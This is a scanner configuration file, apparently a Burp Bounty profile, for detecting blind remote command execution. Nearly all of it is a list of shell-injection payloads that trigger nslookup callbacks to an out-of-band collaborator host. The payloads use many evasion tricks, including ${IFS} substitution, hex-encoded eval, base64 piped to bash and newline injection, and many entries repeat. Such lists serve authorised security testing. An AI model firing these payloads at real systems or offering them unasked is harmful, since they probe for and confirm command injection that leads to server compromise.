[
  {
    "ProfileName": "BlindRCE - Outbound",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@egarme",
    "Payloads": [
      "true,; (nslookup {BC} \u0026)",
      "true,; (nslookup {BC}) ",
      "true,; { nslookup {BC}; }",
      "true,; nslookup {BC}   ",
      "true,; nslookup {BC} \u0026 #",
      "true,; nslookup {BC} \u0026\u003e /dev/null #",
      "true,; nslookup {BC} # ",
      "true,; nslookup {BC} \u003e /dev/null  ",
      "true,; nslookup {BC} \u003e /dev/null #",
      "true,;(nslookup${IFS}{BC})  ",
      "true,;nslookup${IFS}{BC}  ",
      "true,;nslookup${IFS}{BC}#  ",
      "true,;nslookup${IFS}{BC}\u003e/dev/null  ",
      "true,;nslookup${IFS}{BC}\u0026\u003e/dev/null#  ",
      "true,\u0027; $(nslookup {BC}) #",
      "true,\u0027; nslookup {BC} \u0026 # ",
      "true,\u0027; nslookup {BC} #   ",
      "true,\u0027; nslookup {BC} \u003e /dev/null #",
      "true,\u0027; nslookup {BC}; echo \u0027",
      "true,\u0027;nslookup${IFS}{BC}#  ",
      "true,\u0027;nslookup${IFS}{BC};echo\u0027  ",
      "true,\"; (nslookup {BC}) #",
      "true,\"; $(nslookup {BC}) #",
      "true,\"; nslookup {BC} \u0026 # ",
      "true,\"; nslookup {BC} #",
      "true,\"; nslookup {BC}; echo \"",
      "true,\";nslookup${IFS}{BC}#  ",
      "true,\";nslookup${IFS}{BC};echo\"  ",
      "true,\";nslookup${IFS}{BC}\u0026 #  ",
      "true,\u0026 nslookup {BC}   ",
      "true,\u0026 nslookup {BC} #",
      "true,\u0026\u0026 (nslookup {BC})  ",
      "true,\u0026\u0026 $(nslookup {BC}) #",
      "true,\u0026\u0026 nslookup {BC}  ",
      "true,\u0026\u0026 nslookup {BC} #",
      "true,\u0026\u0026 nslookup {BC} \u003e /dev/null ",
      "true,\u0026\u0026$(nslookup${IFS}{BC}\u003e/dev/null)  ",
      "true,\u0026\u0026nslookup${IFS}{BC}  ",
      "true,\u0026\u0026nslookup${IFS}{BC}#  ",
      "true,\u0026nslookup${IFS}{BC}  ",
      "true,`nslookup {BC} \u0026`",
      "true,`nslookup {BC} \u0026\u003e /dev/null`",
      "true,`nslookup {BC}`",
      "true,`nslookup${IFS}{BC}`  ",
      "true,| `nslookup {BC}` #",
      "true,| nslookup {BC}   ",
      "true,| nslookup {BC} # ",
      "true,|| nslookup {BC}  ",
      "true,|| nslookup {BC} #",
      "true,|| nslookup {BC} 2\u003e /dev/null",
      "true,||nslookup${IFS}{BC}  ",
      "true,|nslookup${IFS}{BC}  ",
      "true,|nslookup${IFS}{BC}#  ",
      "true,$(nslookup {BC} \u0026)",
      "true,$(nslookup {BC}; echo \"\")",
      "true,$(nslookup {BC})",
      "true,$(nslookup${IFS}{BC})  ",
      "true,$(nslookup${IFS}{BC}\u0026)",
      "true,; a\u003dnslookup; b\u003d{BC}; $a${IFS}$b",
      "true,; eval \"nslookup${IFS}{BC}\"",
      "true,; function f() { nslookup {BC}; }; f",
      "true,; cmd\u003d(nslookup {BC}); \"${cmd[@]}\"",
      "true,; time nslookup {BC}",
      "true,; setsid nslookup {BC}",
      "true,; alias n\u003dnslookup; n {BC}",
      "true,; eval $\u0027\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70\u0027${IFS}\u0027{BC}\u0027",
      "true,`; printf \"nslookup {BC}\\n\"",
      "true,; { nslookup {BC}; }",
      "true,;;`nslookup${IFS}{BC}`;;",
      "true,;$(nslookup${IFS}{BC}) \u0026\u0026",
      "true,;$(`nslookup${IFS}{BC}`) ||",
      "true,;;$(nslookup${IFS}{BC});;",
      "true,;$(X\u003d$\u0027nslookup${IFS}{BC}\u0027 \u0026\u0026 $X) \u0026",
      "true,;$(eval${IFS}$\u0027\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70${IFS}{BC}\u0027) ;;",
      "true,;;`nslookup${IFS}{BC} \u003e /dev/null`;;",
      "true,;$(nslookup${IFS}{BC} \u0026)",
      "true,;`$(nslookup${IFS}{BC})` \u0026\u0026",
      "true,;$(nslookup${IFS}{BC}; echo) ||",
      "true,;$(nslookup${IFS}{BC} #) ;;",
      "true,;;$(nslookup${IFS}{BC} \u0026\u003e/dev/null);;",
      "true,;`nslookup${IFS}{BC}` \u0026",
      "true,;$(nslookup${IFS}{BC}${IFS}--) \u0026\u0026",
      "true,;$(`nslookup${IFS}{BC}`) ||",
      "true,||;$(`nslookup${IFS}{BC}`) ||",
      "true,;;$(nslookup${IFS}{BC}) | $(nslookup${IFS}{BC});;",
      "true,;$(nslookup${IFS}{BC} || nslookup${IFS}{BC}) \u0026",
      "true,;$(`nslookup${IFS}{BC} \u0026\u0026 nslookup${IFS}{BC}`) ;;",
      "true,;;`$(nslookup${IFS}{BC})`;;",
      "true,;$(nslookup${IFS}{BC} \u0026\u003e/dev/null) \u0026\u0026",
      "true,||nslookup {BC}||",
      "true,;;`nslookup${IFS}{BC}`;;",
      "true,;$(nslookup${IFS}{BC}) \u0026\u0026",
      "true,;$(`nslookup${IFS}{BC}`) ||",
      "true,;;$(nslookup${IFS}{BC});;",
      "true,;$(X\u003d$\u0027nslookup${IFS}{BC}\u0027 \u0026\u0026 $X) \u0026",
      "true,;$(eval${IFS}$\u0027\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70${IFS}{BC}\u0027) ;;",
      "true,;;`nslookup${IFS}{BC} \u003e /dev/null`;;",
      "true,;$(nslookup${IFS}{BC} \u0026)",
      "true,;`$(nslookup${IFS}{BC})` \u0026\u0026",
      "true,;$(nslookup${IFS}{BC}; echo) ||",
      "true,;$(nslookup${IFS}{BC} #) ;;",
      "true,;;$(nslookup${IFS}{BC} \u0026\u003e/dev/null);;",
      "true,;`nslookup${IFS}{BC}` \u0026",
      "true,;$(nslookup${IFS}{BC}${IFS}--) \u0026\u0026",
      "true,;$(`nslookup${IFS}{BC}`) ||",
      "true,||;$(`nslookup${IFS}{BC}`) ||",
      "true,;;$(nslookup${IFS}{BC}) | $(nslookup${IFS}{BC});;",
      "true,;$(nslookup${IFS}{BC} || nslookup${IFS}{BC}) \u0026",
      "true,;$(`nslookup${IFS}{BC} \u0026\u0026 nslookup${IFS}{BC}`) ;;",
      "true,;;`$(nslookup${IFS}{BC})`;;",
      "true,;$(nslookup${IFS}{BC} \u0026\u003e/dev/null) \u0026\u0026",
      "true,||nslookup {BC}||",
      "true,; echo -e \"\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70\" {BC} | bash",
      "true,; printf \"nslookup {BC}\\n\" | sh",
      "true,; eval $\u0027\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70${IFS}{BC}\u0027",
      "true,; base64 -d \u003c\u003c\u003c\"bnNsb29rdXAgZ3IuMTUwLntDQkN9\" | bash",
      "true,; `$(nslookup {BC})`",
      "true,; `eval $(nslookup {BC})`",
      "true,; $(echo $(nslookup {BC}))",
      "true,; `echo $(nslookup {BC})`",
      "true,; $(eval echo $(nslookup {BC}))",
      "true,||nslookup {BC}||",
      "true,\u0026\u0026nslookup {BC}\u0026\u0026",
      "true,\u0026 nslookup {BC} \u0026",
      "true,| nslookup {BC} |",
      "true,; nslookup {BC} ;",
      "true,\u0026\u0026 nslookup {BC} \u0026\u0026",
      "true,X\u003dnslookup; Y\u003d{BC}; $X${IFS}$Y",
      "true,eval \"nslookup${IFS}{BC}\"",
      "true,a\u003dnslookup; b\u003d{BC}; $a${IFS}$b",
      "true,cmd\u003d(nslookup {BC}); \"${cmd[@]}\"",
      "true,\u0027nslookup {BC}\u0027",
      "true,\"nslookup {BC}\"",
      "true,\u0027$(nslookup {BC})\u0027",
      "true,\"$(nslookup {BC})\"",
      "true,\u0027`nslookup {BC}`\u0027",
      "true,\"`nslookup {BC}`\"",
      "true,; (nslookup {BC})",
      "true,$(nslookup {BC})",
      "true,`nslookup {BC}`",
      "true,`echo $(nslookup {BC})`",
      "true,$(echo nslookup {BC})",
      "true,`nslookup {BC} \u0026`",
      "true,`nslookup {BC} \u003e /dev/null`",
      "true,; $(nslookup {BC})",
      "true,; $(nslookup${IFS}{BC})",
      "true,\\n nslookup {BC}",
      "true,\\n;nslookup {BC}",
      "true,\\n%0a nslookup {BC}",
      "true,\\n%0a;nslookup {BC}",
      "true,\\n $(nslookup {BC})",
      "true,\\n%0a $(nslookup {BC})",
      "true,\\n `nslookup {BC}`",
      "true,\\n%0a `nslookup {BC}`",
      "true,\\n nslookup${IFS}{BC}",
      "true,\\n%0a nslookup${IFS}{BC}",
      "true,\\n;nslookup${IFS}{BC};%0a",
      "true,\\n%0a;nslookup${IFS}{BC};%0a",
      "true,\\n \"nslookup {BC}\"",
      "true,\\n%0a \"nslookup {BC}\"",
      "true,\\n \u0027nslookup {BC}\u0027"
    ],
    "Encoder": [
      "URL-encode key characters"
    ],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [],
    "Tags": [
      "Collaborator",
      "RCE",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "BlindRCE - Outbound",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "RCE with el payloads: \u003cbr\u003e  \u003cpayload\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]